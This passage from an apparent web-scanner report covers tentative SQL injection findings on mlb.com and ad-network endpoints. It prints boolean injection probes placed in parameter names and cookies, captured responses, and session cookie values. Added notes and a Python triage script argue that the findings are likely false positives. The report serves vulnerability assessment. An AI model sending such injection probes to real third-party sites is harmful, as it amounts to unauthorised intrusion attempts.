{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aHA5bXFndihnaWQkYTRjMjBlZWEtMDI2MS0xMWUwLWIzMmItOGJjNjgzZGMwZTVmLHN0JDEyOTE3Njc5MjIwMzcwMjQsc2kkMjExMDUxLHYkMS4wLGFpZCRGdHhyS1V3Tmlacy0sY3QkMjUseWJ4JDdhZFJyXzJxWDNxWGUxLmlLYzNINmcsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width
...[SNIP]...

Request 2

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d2--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22i
mage%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:25:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=0lbrjth6ftk3i&t=1291767922;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19333


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=1630pfmo8/M=600996958.601271502.459798051.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=a50980ea-0261-11e0-bcf7-af2f570c8c0a/B=8Yv6BdFJpB0-/J=1291767922561936/K=0EUsCN3j_fF_fLcH0QO9sA/EXP=1291775122/A=1974817592210663262/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=a50980ea-0261-11e0-bcf7-af2f570c8c0a&T=19e82bipl%2fX%3d1291767922%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d3722408356%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSJhNTA5ODBlYS0wMjYxLTExZTAtYmNmNy1hZjJmNTcwYzhjMGEiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzkyMjUwNTY0MCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d24558862&U=13ucmp3m1%2fN%3d8Yv6BdFJpB0-%2fC%3d600996958.601271502.459798051.475726551%2fD%3dAP15%2fB%3d1974817592210663262%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|a50980ea-0261-11e0-bcf7-af2f570c8c0a--><!--TRK:a:1974817592210663262,m:600996958.601271502.459798051.475726551--><!--fac14.cl1.ads.adx.ac4.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aGxxYTBuaihnaWQkYTUwOTgwZWEtMDI2MS0xMWUwLWJjZjctYWYyZjU3MGM4YzBhLHN0JDEyOTE3Njc5MjI1MDU2NDAsc2kkMjExMDUxLHYkMS4wLGFpZCQ0dEx6ZUdLSVZTUS0sY3QkMjUseWJ4JDdhZFJyXzJxWDNxWGUxLmlLYzNINmcsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" widt
...[SNIP]...

1.121. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sanfrancisco.giants.mlb.com
Path:   /index.jsp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 86828936%20or%201%3d1--%20 and 86828936%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the visible portion of Response 1 renders the STRIKEOUTS leader board and Response 2 the WINS leader board: the page rotates which pitching-stat module it shows, and the parameter name being tested is one chosen arbitrarily by the scanner, so content rotation accounts for the difference (and for the ten-byte change in Content-Length). The Cache-Control: max-age=599 header also means either request may have been answered from a cached copy, which makes a response diff even less meaningful.

Request 1

GET /index.jsp?c_id=sf&186828936%20or%201%3d1--%20=1 HTTP/1.1
Host: sanfrancisco.giants.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=599
Expires: Wed, 08 Dec 2010 01:22:45 GMT
Date: Wed, 08 Dec 2010 01:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139605


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<div class="stat_type matchupSchedBg">STRIKEOUTS</div>
<div class="name_num">
<div class="stat_name">
<a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=453311">Lincecum</a>
</div>
<div class="stat_num">231</div>
</div>
</div>
</div>
<div class="other_leader">
<div class="other_name">2.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=456043">Sanchez</a>
</div>
<div class="other_num">205</div>
</div>
<div class="other_leader">
<div class="other_name">3.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=430912">Cain</a>
</div>
<div class="other_num">177</div>
</div>
</div>

   
   <span class="more"><a href="/stats/sortable_player_stats.jsp?c_id=sf&baseballScope=sfn&subScope=pos&teamPosCode=all&statType=Overview&timeSubFrame=2010&sitSplit=&venueID=&Submit=Submit&timeFrame=1" >View Complete Stats</a></span>
</div>
</div>                                                
                       
                       <div class="h_module_content">





<style>

/* STANDINGS */
#standings_container { }
#standings_container #standingsBg {background:url(/images/homepage/y2008/bg_200x290.png) no-repeat; height:290px}
*html #standingsBg {behavior: url(/scripts/fix_png_bg.htc); }
#standings_container #stand_head { display: block; padding-top: 6px; margin-left: 6px; }
#standings_data, #wildcard_data { height:266px; overflow: hidden; }
/* *html #standings_data, #wildcard_data {height: 275px;} */
#standings_container .standings_data_table { width: 186px; }
.standings_data_table th, .standings_data_table td {border-bottom:1px solid #DDDDDD;border-spacing:0;font-size:11px; text-align:center; }
.standings_data_table td.alignLeft, .standings_data_table th.alignLeft {text-align:left; padding-left:3px}
#standings_container .standings_extended{margin-left:15px; font-size: 11px;}
#standings_container .standings_clinch {font-size:11px; margin:0 0 20px 15px;height:45px; display:none;}
#standings_container #standings_link { margin-top:0px; height:14px; font-size:11px;}
#standings_container .standings_mn im
...[SNIP]...

Request 2

GET /index.jsp?c_id=sf&186828936%20or%201%3d2--%20=1 HTTP/1.1
Host: sanfrancisco.giants.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=599
Expires: Wed, 08 Dec 2010 01:22:46 GMT
Date: Wed, 08 Dec 2010 01:12:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139595


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<div class="stat_type matchupSchedBg">WINS</div>
<div class="name_num">
<div class="stat_name">
<a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=453311">Lincecum</a>
</div>
<div class="stat_num">16</div>
</div>
</div>
</div>
<div class="other_leader">
<div class="other_name">2.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=430912">Cain</a>
</div>
<div class="other_num">13</div>
</div>
<div class="other_leader">
<div class="other_name">2.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=456043">Sanchez</a>
</div>
<div class="other_num">13</div>
</div>
</div>

   
   <span class="more"><a href="/stats/sortable_player_stats.jsp?c_id=sf&baseballScope=sfn&subScope=pos&teamPosCode=all&statType=Overview&timeSubFrame=2010&sitSplit=&venueID=&Submit=Submit&timeFrame=1" >View Complete Stats</a></span>
</div>
</div>                                                
                       
                       <div class="h_module_content">





<style>

/* STANDINGS */
#standings_container { }
#standings_container #standingsBg {background:url(/images/homepage/y2008/bg_200x290.png) no-repeat; height:290px}
*html #standingsBg {behavior: url(/scripts/fix_png_bg.htc); }
#standings_container #stand_head { display: block; padding-top: 6px; margin-left: 6px; }
#standings_data, #wildcard_data { height:266px; overflow: hidden; }
/* *html #standings_data, #wildcard_data {height: 275px;} */
#standings_container .standings_data_table { width: 186px; }
.standings_data_table th, .standings_data_table td {border-bottom:1px solid #DDDDDD;border-spacing:0;font-size:11px; text-align:center; }
.standings_data_table td.alignLeft, .standings_data_table th.alignLeft {text-align:left; padding-left:3px}
#standings_container .standings_extended{margin-left:15px; font-size: 11px;}
#standings_container .standings_clinch {font-size:11px; margin:0 0 20px 15px;height:45px; display:none;}
#standings_container #standings_link { margin-top:0px; height:14px; font-size:11px;}
#standings_container .standings_mn img {margin
...[SNIP]...

1.122. http://tap.rubiconproject.com/oz/sensor [au cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Response 1 below is a 204 No Content with an empty body, so any difference between the two responses can only be in the headers, and the dq cookie is a counter the server advances on every request (10|1|9|0 in the request, 11|1|10|0 in the response); two unmodified requests would therefore also differ. Response 2 is not included in this excerpt.
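The manual review asked for in this note, and in the identical notes under 1.119, 1.120 and 1.121, amounts to two checks the scanner did not perform: replay the unmodified request several times to measure how much the endpoint differs with itself, and mask the content that is known to change on every request before comparing the true-condition and false-condition responses. The following Python script is an added example, not part of this report or of Burp's own code, that carries out both checks offline. The response bodies it works on are constructed stand-ins modelled on the multiAdPack JSON and the mlb.com responses above, and the volatile-field patterns (the single-letter path tokens, the MME/TRK/fac comments, Set-Cookie, Content-Length) are assumptions drawn from what visibly varies between the two yieldmanager responses.

```python
"""Triage a boolean-based (1=1 / 1=2) SQL injection candidate.

Added example, not from the report or from Burp. Verdicts:
  noisy            unmodified request differs with itself; a diff proves nothing
  no_difference    true and false payloads both look like the baseline
  likely_injection true payload == baseline, false payload materially differs
  inconclusive     anything else (re-test, e.g. with more samples)
"""
import difflib
import json
import re

# ASSUMED volatile-content patterns, modelled on what changes between the two
# yieldmanager responses in the report: single-letter key=value path/query
# tokens (SIG=, M=, L=, J=, K=, B=...), the per-serve tracking comments, UUIDs,
# the S= session cookie and Content-Length.
VOLATILE = [
    (re.compile(r'([/?&][A-Z]{1,3}=)[^/"&<\\]+'), r'\1<volatile>'),
    (re.compile(r'<!--(?:MME|TRK|fac)[^>]*-->'), '<volatile>'),
    (re.compile(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'), '<volatile>'),
    (re.compile(r'Set-Cookie:[^\r\n]*'), '<volatile>'),
    (re.compile(r'Content-Length: \d+'), '<volatile>'),
]


def normalize(body: str) -> str:
    """Mask per-request noise so only input-dependent content is compared."""
    for pattern, repl in VOLATILE:
        body = pattern.sub(repl, body)
    return body


def similarity(a: str, b: str) -> float:
    return difflib.SequenceMatcher(None, a, b).ratio()


def triage(baseline, true_cond, false_cond, normalizer=normalize, threshold=0.98):
    """baseline: bodies from replaying the UNMODIFIED request several times;
    true_cond / false_cond: bodies for the 1=1 and 1=2 payloads."""
    base = [normalizer(b) for b in baseline]
    if len(set(base)) != 1:
        return "noisy"
    ref = base[0]
    trues = [normalizer(b) for b in true_cond]
    falses = [normalizer(b) for b in false_cond]
    true_matches = all(t == ref for t in trues)
    if true_matches and all(f == ref for f in falses):
        return "no_difference"
    if true_matches and all(similarity(ref, f) < threshold for f in falses):
        return "likely_injection"
    return "inconclusive"


# --- constructed sample data (not captured traffic) -------------------------
AD_TEMPLATE = (
    'Content-Length: %d\r\n\r\n'
    '(function(){ var multiAdPack = {"ads":[{"ad":"<a href=\\"http://us.ard.yahoo.com/'
    'SIG=%s/M=601052417.601382328/L=%s/B=brIcA0S0q98-/*http://www.bay101.com/\\">'
    '<img src=\\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7\\" width=130 height=70></a>'
    '<!--MME|%s--><!--QYZ ,;130x70;ipbtf_tlsb;-->","size":["130x70"]}]}; })();'
)


def ad_response(sig, serve_id, length):
    """Stand-in for the ad-server response: same creative, rotating tokens."""
    return AD_TEMPLATE % (length, sig, serve_id, serve_id)


def item_response(session, rows):
    """Stand-in for an endpoint whose row set really depends on the input."""
    return 'Set-Cookie: S=s=%s;path=/\r\n\r\n{"results":%s}' % (session, json.dumps(rows))


AD_BASELINE = [
    ad_response("163h8r1o2", "602f48c4-0261-11e0-b779-0b7c1fdfcc42", 19302),
    ad_response("163ph2bt2", "59588b4a-0262-11e0-bc79-3f914c26f4f7", 19313),
    ad_response("1631s5m15", "5991a5ba-0262-11e0-bc7c-8773473a0330", 19323),
]
AD_TRUE = [ad_response("163ptelbu", "a4c20eea-0261-11e0-b32b-8bc683dc0e5f", 19302)]
AD_FALSE = [ad_response("1630pfmo8", "a50980ea-0261-11e0-bcf7-af2f570c8c0a", 19333)]

ROWS = [{"id": 453311, "name": "Lincecum"}]
ITEM_BASELINE = [item_response(s, ROWS) for s in ("7du40c56ftkd1", "d6sobqp6ftkd1", "brjll816ftk3i")]
ITEM_TRUE = [item_response("0lbrjth6ftk3i", ROWS)]
ITEM_FALSE = [item_response("3037rkh6ftelv", [])]  # 1=2 empties the row set

if __name__ == "__main__":
    print("ad server, raw bodies      :", triage(AD_BASELINE, AD_TRUE, AD_FALSE, normalizer=lambda b: b))
    print("ad server, normalized      :", triage(AD_BASELINE, AD_TRUE, AD_FALSE))
    print("input-dependent endpoint   :", triage(ITEM_BASELINE, ITEM_TRUE, ITEM_FALSE))
```

Run as-is, the ad-server samples come back "noisy" when compared raw and "no_difference" once the rotating tokens are masked, which is the outcome the yieldmanager pairs above point to; only the constructed endpoint whose false payload drops the rows is classed "likely_injection". Against a live target the three lists would be filled from real replays, and the VOLATILE list must be tuned per application: a mask that is too broad hides a real injection, one that is too narrow reports every ad rotation as one.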

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4'%20and%201%3d1--%20; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:03 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:03 GMT; Path=/
Set-Cookie: dq=11|1|10|0; Expires=Thu, 08-Dec-2011 00:32:03 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4'%20and%201%3d2--%20; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:03 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.123. http://tap.rubiconproject.com/oz/sensor [cd cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=62&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,silicon+valley:40,mercury:40,news+silicon:40,high+speed:40,chrome+os:40,bay+area:40,news+breaking:40,breaking+news:40,local+events:40,rosies+posie:32,clara+county:32,san+francisco:32,santa+clara:32,speed+rail:32,biz+break:32,os+notebook:28,los+gatos:24,site+map:24,area+living:24,real+estate:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,breaking+new:20,local+event:20,newspaper:16,delivery:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; cd=false'%20and%201%3d1--%20; dq=9|1|8|0; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=441745.js^1^1291762372^1291762372

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:18 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:18 GMT; Path=/
Set-Cookie: dq=10|1|9|0; Expires=Thu, 08-Dec-2011 00:32:18 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=62&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,silicon+valley:40,mercury:40,news+silicon:40,high+speed:40,chrome+os:40,bay+area:40,news+breaking:40,breaking+news:40,local+events:40,rosies+posie:32,clara+county:32,san+francisco:32,santa+clara:32,speed+rail:32,biz+break:32,os+notebook:28,los+gatos:24,site+map:24,area+living:24,real+estate:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,breaking+new:20,local+event:20,newspaper:16,delivery:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
